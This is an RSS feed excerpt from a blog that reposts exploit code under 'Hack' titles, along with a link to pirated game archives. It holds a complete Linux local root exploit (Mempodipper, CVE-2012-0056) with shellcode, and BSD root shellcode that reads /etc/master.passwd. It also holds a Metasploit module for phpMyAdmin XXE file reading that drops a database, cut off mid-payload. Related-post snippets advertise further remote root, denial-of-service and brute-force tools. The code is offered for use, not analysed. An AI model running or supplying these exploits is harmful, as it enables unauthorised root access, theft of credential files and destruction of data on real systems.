01.16.13 Released &#8211; Download</a></h3><p>multiMAN ver 1.16.1 has been released by Dean, the changelog is shown below: 01.16.12/13 - * Added: new options in options.ini: [usb_mirror], [verify_data] and [download_dir] ...</p></div></li><li><div class="seo_alrp_rl_content"><h3><a href="http://www.smoothblog.co.uk/2012/01/24/trashboxpsnps3duplex-released-download/" rel="bookmark">Trash.Box.PSN.PS3-DUPLEX Released &#8211; Download</a></h3><p>Size: 1362 MB http://depositfiles.com/files/mpbiz3anw/Trash.Box.PSN.PS3-DUPLEX.part1.rar http://depositfiles.com/files/cnmurziw5/Trash.Box.PSN.PS3-DUPLEX.part2.rar</p></div></li></ul></div>]]></content:encoded>
			<wfw:commentRss>http://www.smoothblog.co.uk/2012/01/29/microsoftwindows8rc1isolz0-released-download/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Hack &#8211; Linux Local Root Via SUID /prod/pid/mem Write</title>
		<link>http://www.smoothblog.co.uk/2012/01/24/hack-linux-local-root-suid-prodpidmem-write/</link>
		<comments>http://www.smoothblog.co.uk/2012/01/24/hack-linux-local-root-suid-prodpidmem-write/#comments</comments>
		<pubDate>Mon, 23 Jan 2012 23:26:49 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Technology]]></category>

		<guid isPermaLink="false">http://www.smoothblog.co.uk/?p=10223</guid>
		<description><![CDATA[/* * Mempodipper * by zx2c4 * * Linux Local Root Exploit * * Rather than put my write up here, per usual, this time I've put it * in a rather lengthy blog post: http://blog.zx2c4.com/749 * * Enjoy. * * - zx2c4 * Jan 21, 2012 * * CVE-2012-0056 */ #define _LARGEFILE64_SOURCE #include &#60;stdio.h&#62; [...]]]></description>
			<content:encoded><![CDATA[<div class="tweetmeme_button" style="float: right; margin-left: 10px;">
			<a href="http://api.tweetmeme.com/share?url=http%3A%2F%2Fwww.smoothblog.co.uk%2F2012%2F01%2F24%2Fhack-linux-local-root-suid-prodpidmem-write%2F"><br />
				<img src="http://api.tweetmeme.com/imagebutton.gif?url=http%3A%2F%2Fwww.smoothblog.co.uk%2F2012%2F01%2F24%2Fhack-linux-local-root-suid-prodpidmem-write%2F&amp;source=smoothblog&amp;style=normal&amp;service=bit.ly&amp;service_api=R_69b2097aa0e1b6d642c5d4634b9831a7&amp;b=2" height="61" width="50" /><br />
			</a>
		</div>
<pre><code>/*
 * Mempodipper
 * by zx2c4
 *
 * Linux Local Root Exploit
 *
 * Rather than put my write up here, per usual, this time I've put it
 * in a rather lengthy blog post: http://blog.zx2c4.com/749
 *
 * Enjoy.
 *
 * - zx2c4
 * Jan 21, 2012
 *
 * CVE-2012-0056
 */

#define _LARGEFILE64_SOURCE
#include &lt;stdio.h&gt;
#include &lt;string.h&gt;
#include &lt;stdlib.h&gt;
#include &lt;sys/types.h&gt;
#include &lt;sys/stat.h&gt;
#include &lt;sys/socket.h&gt;
#include &lt;sys/un.h&gt;
#include &lt;fcntl.h&gt;
#include &lt;unistd.h&gt;
#include &lt;limits.h&gt;

int send_fd(int sock, int fd)
{
 char buf[1];
 struct iovec iov;
 struct msghdr msg;
 struct cmsghdr *cmsg;
 int n;
 char cms[CMSG_SPACE(sizeof(int))];

 buf[0] = 0;
 iov.iov_base = buf;
 iov.iov_len = 1;

 memset(&amp;msg, 0, sizeof msg);
 msg.msg_iov = &amp;iov;
 msg.msg_iovlen = 1;
 msg.msg_control = (caddr_t)cms;
 msg.msg_controllen = CMSG_LEN(sizeof(int));

 cmsg = CMSG_FIRSTHDR(&amp;msg);
 cmsg-&gt;cmsg_len = CMSG_LEN(sizeof(int));
 cmsg-&gt;cmsg_level = SOL_SOCKET;
 cmsg-&gt;cmsg_type = SCM_RIGHTS;
 memmove(CMSG_DATA(cmsg), &amp;fd, sizeof(int));

 if ((n = sendmsg(sock, &amp;msg, 0)) != iov.iov_len)
 return -1;
 close(sock);
 return 0;
}

int recv_fd(int sock)
{
 int n;
 int fd;
 char buf[1];
 struct iovec iov;
 struct msghdr msg;
 struct cmsghdr *cmsg;
 char cms[CMSG_SPACE(sizeof(int))];

 iov.iov_base = buf;
 iov.iov_len = 1;

 memset(&amp;msg, 0, sizeof msg);
 msg.msg_name = 0;
 msg.msg_namelen = 0;
 msg.msg_iov = &amp;iov;
 msg.msg_iovlen = 1;

 msg.msg_control = (caddr_t)cms;
 msg.msg_controllen = sizeof cms;

 if ((n = recvmsg(sock, &amp;msg, 0)) &lt; 0)
 return -1;
 if (n == 0)
 return -1;
 cmsg = CMSG_FIRSTHDR(&amp;msg);
 memmove(&amp;fd, CMSG_DATA(cmsg), sizeof(int));
 close(sock);
 return fd;
}

int main(int argc, char **argv)
{
 if (argc &gt; 2 &amp;&amp; argv[1][0] == '-' &amp;&amp; argv[1][1] == 'c') {
 char parent_mem[256];
 sprintf(parent_mem, "/proc/%d/mem", getppid());
 printf("[+] Opening parent mem %s in child.\n", parent_mem);
 int fd = open(parent_mem, O_RDWR);
 if (fd &lt; 0) {
 perror("[-] open");
 return 1;
 }
 printf("[+] Sending fd %d to parent.\n", fd);
 send_fd(atoi(argv[2]), fd);
 return 0;
 }

 printf("===============================\n");
 printf("= Mempodipper =\n");
 printf("= by zx2c4 =\n");
 printf("= Jan 21, 2012 =\n");
 printf("===============================\n\n");

 int sockets[2];
 printf("[+] Opening socketpair.\n");
 if (socketpair(AF_UNIX, SOCK_STREAM, 0, sockets) &lt; 0) {
 perror("[-] socketpair");
 return -1;
 }
 if (fork()) {
 printf("[+] Waiting for transferred fd in parent.\n");
 int fd = recv_fd(sockets[1]);
 printf("[+] Received fd at %d.\n", fd);
 if (fd &lt; 0) {
 perror("[-] recv_fd");
 return -1;
 }
 printf("[+] Assigning fd %d to stderr.\n", fd);
 dup2(2, 6);
 dup2(fd, 2);

 unsigned long address;
 if (argc &gt; 2 &amp;&amp; argv[1][0] == '-' &amp;&amp; argv[1][1] == 'o')
 address = strtoul(argv[2], NULL, 16);
 else {
 printf("[+] Reading su for exit@plt.\n");
 // Poor man's auto-detection. Do this in memory instead of relying on objdump being installed.
 FILE *command = popen("objdump -d /bin/su|grep '&lt;exit@plt&gt;'|head -n 1|cut -d ' ' -f 1|sed 's/^[0]*\\([^0]*\\)/0x\\1/'", "r");
 char result[32];
 result[0] = 0;
 fgets(result, 32, command);
 pclose(command);
 address = strtoul(result, NULL, 16);
 if (address == ULONG_MAX || !address) {
 printf("[-] Could not resolve /bin/su. Specify the exit@plt function address manually.\n");
 printf("[-] Usage: %s -o ADDRESS\n[-] Example: %s -o 0x402178\n", argv[0], argv[0]);
 return 1;
 }
 printf("[+] Resolved exit@plt to 0x%lx.\n", address);
 }
 printf("[+] Calculating su padding.\n");
 FILE *command = popen("/bin/su this-user-does-not-exist 2&gt;&amp;1", "r");
 char result[256];
 result[0] = 0;
 fgets(result, 256, command);
 pclose(command);
 unsigned long su_padding = (strstr(result, "this-user-does-not-exist") - result) / sizeof(char);
 unsigned long offset = address - su_padding;
 printf("[+] Seeking to offset 0x%lx.\n", offset);
 lseek64(fd, offset, SEEK_SET);

#if defined(__i386__)
 // See shellcode-32.s in this package for the source.
 char shellcode[] =
 "\x31\xdb\xb0\x17\xcd\x80\x31\xdb\xb0\x2e\xcd\x80\x31\xc9\xb3"
 "\x06\xb1\x02\xb0\x3f\xcd\x80\x31\xc0\x50\x68\x6e\x2f\x73\x68"
 "\x68\x2f\x2f\x62\x69\x89\xe3\x31\xd2\x66\xba\x2d\x69\x52\x89"
 "\xe0\x31\xd2\x52\x50\x53\x89\xe1\x31\xd2\x31\xc0\xb0\x0b\xcd"
 "\x80";
#elif defined(__x86_64__)
 // See shellcode-64.s in this package for the source.
 char shellcode[] =
 "\x48\x31\xff\xb0\x69\x0f\x05\x48\x31\xff\xb0\x6a\x0f\x05\x40"
 "\xb7\x06\x40\xb6\x02\xb0\x21\x0f\x05\x48\xbb\x2f\x2f\x62\x69"
 "\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x48\x31\xdb"
 "\x66\xbb\x2d\x69\x53\x48\x89\xe1\x48\x31\xc0\x50\x51\x57\x48"
 "\x89\xe6\x48\x31\xd2\xb0\x3b\x0f\x05";

#else
#error "That platform is not supported."
#endif
 printf("[+] Executing su with shellcode.\n");
 execl("/bin/su", "su", shellcode, NULL);
 } else {
 char sock[32];
 sprintf(sock, "%d", sockets[0]);
 printf("[+] Executing child from child fork.\n");
 execl("/proc/self/exe", argv[0], "-c", sock, NULL);
 }
}</code></pre>
<div id="seo_alrp_related"><h2>Posts Related to Hack - Linux Local Root Via SUID /prod/pid/mem Write</h2><ul><li><div class="seo_alrp_rl_content"><h3><a href="http://www.smoothblog.co.uk/2011/12/27/hack-telnetd-encryptkeyid-remote-root/" rel="bookmark">Hack &#8211; Telnetd encrypt_keyid Remote Root</a></h3><p>/*************************************************************************** * telnetd-encrypt_keyid.c * * Mon Dec 26 20:37:05 CET 2011 * Copyright 2011 Jaime Penalba Estebanez (NighterMan) * * nighterman@painsec.com - jpenalbae@gmail.com * Credits ...</p></div></li><li><div class="seo_alrp_rl_content"><h3><a href="http://www.smoothblog.co.uk/2012/01/22/hacking-mysql-brute-force-tool/" rel="bookmark">Hacking &#8211; MySQL Brute Force Tool</a></h3><p>/* * This program is free software; you can redistribute it and/or modify * it under the terms of the GNU General Public License as ...</p></div></li><li><div class="seo_alrp_rl_content"><h3><a href="http://www.smoothblog.co.uk/2011/12/27/hack-lighttpd-1430-15-denial-service/" rel="bookmark">Hack &#8211; Lighttpd 1.4.30 / 1.5 Denial Of Service</a></h3><p>/* * Primitive Lighttpd Proof of Concept code for CVE-2011-4362 vulnerability discovered by Xi Wang * * Here the vulnerable code (src/http_auth.c:67) * * --- ...</p></div></li><li><div class="seo_alrp_rl_content"><h3><a href="http://www.smoothblog.co.uk/2011/06/14/hacking-dns-distributed-reflected-denial-service-tool/" rel="bookmark">Hacking &#8211; DNS Distributed Reflected Denial Of Service Tool</a></h3><p>Proof of concept code that demonstrates a distributed DNS reflection denial of service attack. This code is a little bit long so wont be leaving ...</p></div></li><li><div class="seo_alrp_rl_content"><h3><a href="http://www.smoothblog.co.uk/2011/01/05/ps3-scekrit-tool-private-sony-keys/" rel="bookmark">PS3 &#8211; SCEkrit a Tool To Get Private Sony Keys</a></h3><p>This little big of code can be useful in obtaining the needed 'private' keys for SIGNING your own 'homebrew', since as Team fail0verflow pointed out ...</p></div></li></ul></div>]]></content:encoded>
			<wfw:commentRss>http://www.smoothblog.co.uk/2012/01/24/hack-linux-local-root-suid-prodpidmem-write/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Hack &#8211; BSD/x86 execve (&#8216;/bin/sh -c &#8220;/etc/master.passwd&#8221;&#8216;) setreuid(0,0) Shellcode</title>
		<link>http://www.smoothblog.co.uk/2012/01/22/hack-bsdx86-execve-binsh-etcmasterpasswd-setreuid00-shellcode/</link>
		<comments>http://www.smoothblog.co.uk/2012/01/22/hack-bsdx86-execve-binsh-etcmasterpasswd-setreuid00-shellcode/#comments</comments>
		<pubDate>Sun, 22 Jan 2012 15:36:02 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Technology]]></category>

		<guid isPermaLink="false">http://www.smoothblog.co.uk/?p=10206</guid>
		<description><![CDATA[1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' \ __ /'__`\ /\ \__ /'__`\ 0 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1 1 \/_/\ \ /' _ `\ \/\ \/_/_\_&#60;_ /'___\ \ \/\ \ \ \ \/\`'__\ 0 0 \ \ \/\ \/\ \ \ \ [...]]]></description>
			<content:encoded><![CDATA[<div class="tweetmeme_button" style="float: right; margin-left: 10px;">
			<a href="http://api.tweetmeme.com/share?url=http%3A%2F%2Fwww.smoothblog.co.uk%2F2012%2F01%2F22%2Fhack-bsdx86-execve-binsh-etcmasterpasswd-setreuid00-shellcode%2F"><br />
				<img src="http://api.tweetmeme.com/imagebutton.gif?url=http%3A%2F%2Fwww.smoothblog.co.uk%2F2012%2F01%2F22%2Fhack-bsdx86-execve-binsh-etcmasterpasswd-setreuid00-shellcode%2F&amp;source=smoothblog&amp;style=normal&amp;service=bit.ly&amp;service_api=R_69b2097aa0e1b6d642c5d4634b9831a7&amp;b=2" height="61" width="50" /><br />
			</a>
		</div>
<pre><code>1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_&lt;_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ &gt;&gt; Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : 1337day.com 0
1 [+] Support e-mail : submit[at]1337day.com 1
0 0
1 ######################################### 1
0 I'm KedAns-Dz member from Inj3ct0r Team 1
1 ######################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

/*
###
# Title : bsd/x86 execve ('/bin/sh -c "/etc/master.passwd"') setreuid(0,0) shellcode - 94 bytes
# Author : KedAns-Dz
# E-mail : ked-h@hotmail.com (ked-h@1337day.com) | ked-h@exploit-id.com | kedans@facebook.com
# Home : Hassi.Messaoud (30500) - Algeria -(00213555248701)
# Web Site : www.1337day.com * sec4ever.com * r00tw0rm.com
# Facebook : http://facebook.com/KedAns
# platform : bsd/x86
# Type : Shellcode - 94 Bytes
# BSD's : FreeBSD , OpenBSD , DragonflyBSD
###

##
# | &gt;&gt; --------+++=[ Dz Offenders Cr3w ]=+++-------- &lt;&lt; |
# | &gt; Indoushka * KedAns-Dz * Caddy-Dz * Kalashinkov3 |
# | Jago-dz * Over-X * Kha&amp;miX * Ev!LsCr!pT_Dz * Dr.55h |
# | KinG Of PiraTeS * The g0bl!n * soucha * dr.R!dE .. |
# | ------------------------------------------------- &lt; |
##

*/

#include &lt;stdio.h&gt;

char sc[] =
"\x31\xC0" // xor %eax,%eax
"\x50" // push %eax
"\x50" // push %eax
"\x50" // push %eax
"\xB0\x7E" // mov %al,$0x7E
"\xCD\x80" // int $0x80
"\x6A\x3B" // push $0x3B
"\x58" // pop %eax
"\x99" // csq
"\x52" // push %edx
"\x68\x2D\x63\x00\x00" // push $0x632D
"\x89\xE7" // mov %edi,%esp
"\x52" // push %edx
"\x68\x6E\x2F\x73\x68" // push $0x68732F6E
"\x68\x2F\x2F\x62\x69" // push $0x69622F2F
"\x89\xE3" // mov %ebx,%esp
"\x52" // push %edx
"\xE8\x20\x90\x90" // call me
"\x2F" // das
"\x62\x69\x6E" // bound %ebp,qword %ecx $0x6E
"\x2F" // das
"\x73\x68" // jnb short me
"\x20\x2D\x63\x20\x22\x2F" // and $0x2F222063,%ch
"\x65\x74\x63" // je short me
"\x2F" // das
"\x6D" // ins dword %edi,%dx
"\x61" // popad
"\x73\x74" // jnb short
"\x65\x72\x2E" // jb short
"\x70\x61" // jo short
"\x73\x73" // jnb short
"\x77\x64" // ja short
"\x22\x00" // and %al,%eax
"\x57" // push %edi
"\x53" // push %ebx
"\x89\xE1" // mov %ecx,%esp
"\x52" // push %edx
"\x51" // push %ecx
"\x53" // push %ebx
"\x50" // push %eax
"\xCD\x80" // int $0x80
"\x31\xC0" // xor %eax,%eax
"\x50" // push %eax
"\xB0\x01" // mov %al,$0x01
"\xCD\x80"; // int $0x80

int main()
{
 int (*dz)() = (int(*)())sc;
 printf("bytes: %u\n", strlen(sc));
 dz();
}

#================[ Exploited By KedAns-Dz * Inj3ct0r Team * ]=====================================
# Greets To : Dz Offenders Cr3w &lt; Algerians HaCkerS &gt; || Rizky Ariestiyansyah * Islam Caddy ..
# + Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re * CrosS (www.1337day.com)
# Inj3ct0r Members 31337 : Indoushka * KnocKout * SeeMe * Kalashinkov3 * ZoRLu * anT!-Tr0J4n *
# Angel Injection (www.1337day.com/team) * Dz Offenders Cr3w * Algerian Cyber Army * Sec4ever
# Exploit-ID Team : jos_ali_joe + Caddy-Dz + kaMtiEz + r3m1ck (exploit-id.com) * Jago-dz * Over-X
# Kha&amp;miX * Str0ke * JF * Ev!LsCr!pT_Dz * KinG Of PiraTeS * www.packetstormsecurity.org * TreX
# www.metasploit.com * UE-Team &amp; I-BackTrack * r00tw0rm.com * All Security and Exploits Webs ..
#================================================================================================</code></pre>
<div id="seo_alrp_related"><h2>Posts Related to Hack - BSD/x86 execve ('/bin/sh -c "/etc/master.passwd"') setreuid(0,0) Shellcode</h2><ul><li><div class="seo_alrp_rl_content"><h3><a href="http://www.smoothblog.co.uk/2011/05/30/hack-freebsdx86-execve-binsh-reboot-shellcode/" rel="bookmark">Hack &#8211; FreeBSD/x86 execve /bin/sh -c &#8220;reboot&#8221; Shellcode</a></h3><p>1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' \ __ /'__`\ /\ \__ /'__`\ 0 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ...</p></div></li><li><div class="seo_alrp_rl_content"><h3><a href="http://www.smoothblog.co.uk/2011/05/19/hacking-linux-reboot-shellcode/" rel="bookmark">Hacking &#8211; Linux Reboot Shellcode</a></h3><p>﻿ 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' \ __ /'__`\ /\ \__ /'__`\ 0 0 /\_, \ ___ /\_\/\_\ \ \ ___\ ...</p></div></li><li><div class="seo_alrp_rl_content"><h3><a href="http://www.smoothblog.co.uk/2011/06/19/hack-openbsdx86-binsh-shellcode/" rel="bookmark">Hack &#8211; OpenBSD/x86 /bin/sh Shellcode</a></h3><p>1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' \ __ /'__`\ /\ \__ /'__`\ 0 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ...</p></div></li><li><div class="seo_alrp_rl_content"><h3><a href="http://www.smoothblog.co.uk/2011/06/30/hack-openbsdx86-reboot-shellcode/" rel="bookmark">Hack &#8211; OpenBSD/x86 Reboot Shellcode</a></h3><p>1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' \ __ /'__`\ /\ \__ /'__`\ 0 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ...</p></div></li><li><div class="seo_alrp_rl_content"><h3><a href="http://www.smoothblog.co.uk/2011/07/02/hack-openssh-34p1-freebsd-remote-root-exploit/" rel="bookmark">Hack &#8211; OpenSSH 3.4p1 FreeBSD Remote Root Exploit</a></h3><p>OpenSSH FreeBSD Remote Root Exploit By Kingcope Year 2011 Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20020702 Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20030924 run like ./ssh -1 -z &lt;yourip&gt; &lt;target&gt; setup a netcat, ...</p></div></li></ul></div>]]></content:encoded>
			<wfw:commentRss>http://www.smoothblog.co.uk/2012/01/22/hack-bsdx86-execve-binsh-etcmasterpasswd-setreuid00-shellcode/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Hack &#8211; phpMyAdmin 3.3.x / 3.4.x Local File Inclusion Via XXE Injection</title>
		<link>http://www.smoothblog.co.uk/2012/01/22/hack-phpmyadmin-33x-34x-local-file-inclusion-xxe-injection/</link>
		<comments>http://www.smoothblog.co.uk/2012/01/22/hack-phpmyadmin-33x-34x-local-file-inclusion-xxe-injection/#comments</comments>
		<pubDate>Sun, 22 Jan 2012 15:35:10 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Technology]]></category>

		<guid isPermaLink="false">http://www.smoothblog.co.uk/?p=10204</guid>
		<description><![CDATA[# Exploit Title: poc-phpmyadmin-local-file-inclusion-via-xxe-injection # Date: 12-01-2012 # Author: Marco Batista # Blog Link: http://www.secforce.com/blog/2012/01/cve-2011-4107-poc-phpmyadmin-local-file-inclusion-via-xxe-injection/ # Tested on: Windows and Linux - phpmyadmin versions: 3.3.6, 3.3.10, 3.4.0, 3.4.5, 3.4.7 # CVE : CVE-2011-4107 require 'msf/core' class Metasploit3 &#60; Msf::Auxiliary include Msf::Exploit::Remote::HttpClient def initialize super( 'Name' =&#62; 'phpMyAdmin 3.3.X and 3.4.X - Local File Inclusion via [...]]]></description>
			<content:encoded><![CDATA[<div class="tweetmeme_button" style="float: right; margin-left: 10px;">
			<a href="http://api.tweetmeme.com/share?url=http%3A%2F%2Fwww.smoothblog.co.uk%2F2012%2F01%2F22%2Fhack-phpmyadmin-33x-34x-local-file-inclusion-xxe-injection%2F"><br />
				<img src="http://api.tweetmeme.com/imagebutton.gif?url=http%3A%2F%2Fwww.smoothblog.co.uk%2F2012%2F01%2F22%2Fhack-phpmyadmin-33x-34x-local-file-inclusion-xxe-injection%2F&amp;source=smoothblog&amp;style=normal&amp;service=bit.ly&amp;service_api=R_69b2097aa0e1b6d642c5d4634b9831a7&amp;b=2" height="61" width="50" /><br />
			</a>
		</div>
<pre><code># Exploit Title: poc-phpmyadmin-local-file-inclusion-via-xxe-injection
# Date: 12-01-2012
# Author: Marco Batista
# Blog Link: http://www.secforce.com/blog/2012/01/cve-2011-4107-poc-phpmyadmin-local-file-inclusion-via-xxe-injection/
# Tested on: Windows and Linux - phpmyadmin versions: 3.3.6, 3.3.10, 3.4.0, 3.4.5, 3.4.7
# CVE : CVE-2011-4107

require 'msf/core'

class Metasploit3 &lt; Msf::Auxiliary

 include Msf::Exploit::Remote::HttpClient
 <span id="more-10204"></span>
 def initialize
 super(
 'Name' =&gt; 'phpMyAdmin 3.3.X and 3.4.X - Local File Inclusion via XXE Injection',
 'Version' =&gt; '1.0',
 'Description' =&gt; %q{Importing a specially-crafted XML file which contains an XML entity injection permits to retrieve a local file (limited by the privileges of the user running the web server).
 The attacker must be logged in to MySQL via phpMyAdmin.
 Works on Windows and Linux Versions 3.3.X and 3.4.X},
 'References' =&gt;
 [
 [ 'CVE', '2011-4107' ],
 [ 'OSVDB', '76798' ],
 [ 'BID', '50497' ],
 [ 'URL', 'http://secforce.com/research/'],
 ],
 'Author' =&gt; [ 'Marco Batista' ],
 'License' =&gt; MSF_LICENSE
 )

 register_options(
 [
 Opt::RPORT(80),
 OptString.new('FILE', [ true, "File to read", '/etc/passwd']),
 OptString.new('USER', [ true, "Username", 'root']),
 OptString.new('PASS', [ false, "Password", 'password']),
 OptString.new('DB', [ true, "Database to use/create", 'hddaccess']),
 OptString.new('TBL', [ true, "Table to use/create and read the file to", 'files']),
 OptString.new('APP', [ true, "Location for phpMyAdmin URL", '/phpmyadmin']),
 OptString.new('DROP', [ true, "Drop database after reading file?", 'true']),
 ],self.class)
 end

 def loginprocess
 # HTTP GET TO GET SESSION VALUES
 getresponse = send_request_cgi({
 'uri' =&gt; datastore['APP']+'/index.php',
 'method' =&gt; 'GET',
 'version' =&gt; '1.1',
 }, 25)

 if (getresponse.nil?)
 print_error("no response for #{ip}:#{rport}")
 elsif (getresponse.code == 200)
 print_status("Received #{getresponse.code} from #{rhost}:#{rport}")
 elsif (getresponse and getresponse.code == 302 or getresponse.code == 301)
 print_status("Received 302 to #{getresponse.headers['Location']}")
 else
 print_error("Received #{getresponse.code} from #{rhost}:#{rport}")
 end

 valuesget = getresponse.headers["Set-Cookie"]
 varsget = valuesget.split(" ")

 #GETTING THE VARIABLES NEEDED
 phpMyAdmin = varsget.grep(/phpMyAdmin/).last
 pma_mcrypt_iv = varsget.grep(/pma_mcrypt_iv/).last
 # END HTTP GET

 # LOGIN POST REQUEST TO GET COOKIE VALUE
 postresponse = send_request_cgi({
 'uri' =&gt; datastore['APP']+'/index.php',
 'method' =&gt; 'POST',
 'version' =&gt; '1.1',
 'headers' =&gt;{
 'Content-Type' =&gt; 'application/x-www-form-urlencoded',
 'Cookie' =&gt; "#{pma_mcrypt_iv} #{phpMyAdmin}"
 },
 'data' =&gt; 'pma_username='+datastore['USER']+'&amp;pma_password='+datastore['PASS']+'&amp;server=1'
 }, 25) 

 if (postresponse["Location"].nil?)
 print_status("TESTING#{postresponse.body.split("'").grep(/token/).first.split("=").last}")
 tokenvalue = postresponse.body.split("'").grep(/token/).first.split("=").last
 else
 tokenvalue = postresponse["Location"].split("&amp;").grep(/token/).last.split("=").last
 end

 valuespost = postresponse.headers["Set-Cookie"]
 varspost = valuespost.split(" ")

 #GETTING THE VARIABLES NEEDED
 pmaUser = varspost.grep(/pmaUser-1/).last
 pmaPass = varspost.grep(/pmaPass-1/).last

 return "#{pma_mcrypt_iv} #{phpMyAdmin} #{pmaUser} #{pmaPass}",tokenvalue
 # END OF LOGIN POST REQUEST
 rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, Rex::ConnectionError =&gt;e
 print_error(e.message)
 rescue Timeout::Error, Errno::EINVAL, Errno::ECONNRESET, EOFError, Errno::ECONNABORTED, Errno::ECONNREFUSED, Errno::EHOSTUNREACH =&gt;e
 print_error(e.message)
 end

 def readfile(cookie,tokenvalue)
 #READFILE TROUGH EXPORT FUNCTION IN PHPMYADMIN
 getfiles = send_request_cgi({
 'uri' =&gt; datastore['APP']+'/export.php',
 'method' =&gt; 'POST',
 'version' =&gt; '1.1',
 'headers' =&gt;{
 'Cookie' =&gt; cookie
 },
 'data' =&gt; 'db='+datastore['DB']+'&amp;table='+datastore['TBL']+'&amp;token='+tokenvalue+'&amp;single_table=TRUE&amp;export_type=table&amp;sql_query=SELECT+*+FROM+%60files%60&amp;what=texytext&amp;texytext_structure=something&amp;texytext_data=something&amp;texytext_null=NULL&amp;asfile=sendit&amp;allrows=1&amp;codegen_structure_or_data=data&amp;texytext_structure_or_data=structure_and_data&amp;yaml_structure_or_data=data'
 }, 25)

 if (getfiles.body.split("\n").grep(/== Dumping data for table/).empty?)
 print_error("Error reading the file... not enough privilege? login error?")
 else
 print_status("#{getfiles.body}")
 end
 end

 def dropdatabase(cookie,tokenvalue)
 dropdb = send_request_cgi({
 'uri' =&gt; datastore['APP']+'/sql.php?sql_query=DROP+DATABASE+%60'+datastore['DB']+'%60&amp;back=db_operations.php&amp;goto=main.php&amp;purge=1&amp;token='+tokenvalue+'&amp;is_js_confirmed=1&amp;ajax_request=false',
 'method' =&gt; 'GET',
 'version' =&gt; '1.1',
 'headers' =&gt;{
 'Cookie' =&gt; cookie
 },
 }, 25)

 print_status("Dropping database: "+datastore['DB'])
 end

 def run
 cookie,tokenvalue = loginprocess()

 print_status("Login at #{datastore['RHOST']}:#{datastore['RPORT']}#{datastore['APP']} using #{datastore['USER']}:#{datastore['PASS']}")

 craftedXML = "------WebKitFormBoundary3XPL01T\n"
 craftedXML &lt;&lt; "Content-Disposition: form-data; name=\"token\"\n\n"
 craftedXML &lt;&lt; tokenvalue+"\n"
 craftedXML &lt;&lt; "------WebKitFormBoundary3XPL01T\n"
 craftedXML &lt;&lt; "Content-Disposition: form-data; name=\"import_type\"\n\n"
 craftedXML &lt;&lt; "server\n"
 craftedXML &lt;&lt; "------WebKitFormBoundary3XPL01T\n"
 craftedXML &lt;&lt; "Content-Disposition: form-data; name=\"import_file\"; filename=\"exploit.xml\"\n"
 craftedXML &lt;&lt; "Content-Type: text/xml\n\n"
 craftedXML &lt;&lt; "&lt;?xml version=\"1.0\" encoding=\"utf-8\"?&gt;\n"
 craftedXML &lt;&lt; "&lt;!DOCTYPE ficheiro [ \n"
 craftedXML &lt;&lt; " &lt;!ENTITY conteudo SYSTEM \"file:///#{datastore['FILE']}\" &gt;]&gt;\n"
 craftedXML &lt;&lt; "&lt;pma_xml_export version=\"1.0\" xmlns:pma=\"http://www.phpmyadmin.net/some_doc_url/\"&gt;\n"
 craftedXML &lt;&lt; " &lt;pma:structure_schemas&gt;\n"
 craftedXML &lt;&lt; " &lt;pma:database name=\""+datastore['DB']+"\" collation=\"utf8_general_ci\" charset=\"utf8\"&gt;\n"
 craftedXML &lt;&lt; " &lt;pma:table name=\""+datastore['TBL']+"\"&gt;\n"
 craftedXML &lt;&lt; " CREATE TABLE `"+datastore['TBL']+"` (`file` varchar(20000) NOT NULL);\n"
 craftedXML &lt;&lt; " &lt;/pma:table&gt;\n"
 craftedXML &lt;&lt; " &lt;/pma:database&gt;\n"
 craftedXML &lt;&lt; " &lt;/pma:structure_schemas&gt;\n"
 craftedXML &lt;&lt; " &lt;database name=\""+datastore['DB']+"\"&gt;\n"
 craftedXML &lt;&lt; " &lt;table name=\""+datastore['TBL']+"\"&gt;\n"
